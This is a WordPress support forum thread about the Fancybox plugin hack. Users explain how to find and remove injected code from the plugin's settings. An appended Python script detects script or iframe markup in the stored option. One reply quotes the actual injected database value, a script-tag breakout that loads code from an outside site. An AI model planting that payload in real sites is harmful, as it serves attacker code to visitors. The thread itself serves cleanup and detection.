Viewing 4 replies - 1 through 4 (of 4 total)
  • paulg000

    (@paulg000)

    One of the sites I developed also had this happen and I isolated it to this plugin.

    Strange thing is I run this plugin on 9/10 sites yet have not experienced it w/any of them.

    All software is up to date, I’d love some insight!

    -Paul

    paulg000

    (@paulg000)

    subscribing

    Hi,

    Regarding fixing affected sites, from what I’ve seen it usually injected an iframe into the source of the site, stored in one of the plugin’s settings. In most cases this can be removed by reverting the plugin settings or manually checking the settings and finding the malicious code, removing it and saving the plugin’s settings. After doing that you can clear cache on the site and check your source code, to see there are no iframes or strange code added in the HEAD tag, especially between the <!-- Fancybox for WordPress --> and <!-- END of Fancybox for WordPress --> lines.

    As I said, I have only seen the vulnerability used for the iframe injection. Nevertheless, for sites that were indeed affected by the issue it’s not a bad idea to change admin and db passwords to be sure.

    For more info on the security issue that was found in February, please check https://www.ads-software.com/plugins/fancybox-for-wordpress/faq/

    A client’s website was unfortunately at the mercy of this attack. I have just deleted and reinstalled the fancybox plugin however the malicious code was still in place upon reinstalling. I found the padding setting within the ‘mfbfw’ row of my database to still have the malicious code. I removed all contents of this row and re-saved my settings within WordPress and the code seems to have gone and all good so far!

    This is what I had in the row:
    a:1:{s:7:"padding";s:110:"</script><script type="text/javascript" src="https://www.caraparts.co.uk/wp-admin/js/xml.php"></script><script>";}
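
Added example, not part of any reply in this thread and not the plugin's own code: a small checker that decodes the PHP-serialized value of the `mfbfw` row and lists every setting that contains script or iframe markup, which is how the leftover `padding` value described above can be found after a reinstall. The function names and sample rows are constructed for illustration, and it assumes you have exported the row's raw value as bytes.

```python
import re

# Markup that has no business in a Fancybox setting such as "padding".
SUSPICIOUS = re.compile(rb"<\s*/?\s*(script|iframe)\b", re.IGNORECASE)

def parse(data, pos=0):
    """Parse one PHP-serialized value (subset: a, s, i, d, b, N) -> (value, next_pos)."""
    kind = data[pos:pos + 1]
    if kind in (b"N", b"i", b"d", b"b"):              # scalars are returned as text
        end = data.index(b";", pos)
        return data[pos + 2:end].decode(), end + 1
    if kind not in (b"s", b"a"):
        raise ValueError(f"unsupported type {kind!r} at offset {pos}")
    colon = data.index(b":", pos + 2)
    size = int(data[pos + 2:colon])
    if kind == b"s":
        start, end = colon + 2, colon + 2 + size      # skip :"
        if data[end:end + 2] != b'";':
            raise ValueError(f"declared length is wrong at offset {pos}")
        return data[start:end], end + 2
    items, pos = {}, colon + 2                        # skip :{
    for _ in range(size):
        key, pos = parse(data, pos)
        items[key], pos = parse(data, pos)
    return items, pos + 1                             # skip }

def flag_settings(value, path=""):
    """List (setting_path, text) for each string setting holding script/iframe markup."""
    if isinstance(value, dict):
        hits = []
        for key, item in value.items():
            name = key.decode(errors="replace") if isinstance(key, bytes) else str(key)
            hits += flag_settings(item, f"{path}/{name}")
        return hits
    if isinstance(value, bytes) and SUSPICIOUS.search(value):
        return [(path, value.decode(errors="replace"))]
    return []

def scan_option(raw):
    """Scan a raw 'mfbfw' option value; a row that will not parse is scanned as raw bytes."""
    try:
        return flag_settings(parse(raw)[0])
    except (ValueError, TypeError):
        return [("(unparsed)", raw.decode(errors="replace"))] if SUSPICIOUS.search(raw) else []

# Constructed samples (not taken from the thread); example.invalid is a placeholder host.
PAYLOAD = b'</script><script src="https://example.invalid/x.js"></script><script>'
CLEAN = b'a:1:{s:7:"padding";s:2:"10";}'
TAMPERED = b'a:1:{s:7:"padding";s:%d:"%s";}' % (len(PAYLOAD), PAYLOAD)
```

`scan_option(TAMPERED)` returns the `/padding` entry with its injected markup, while `scan_option(CLEAN)` returns an empty list; a row whose declared string length no longer matches its content is still flagged through the raw-bytes fallback.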

  • The topic ‘Fancybox Hack’ is closed to new replies.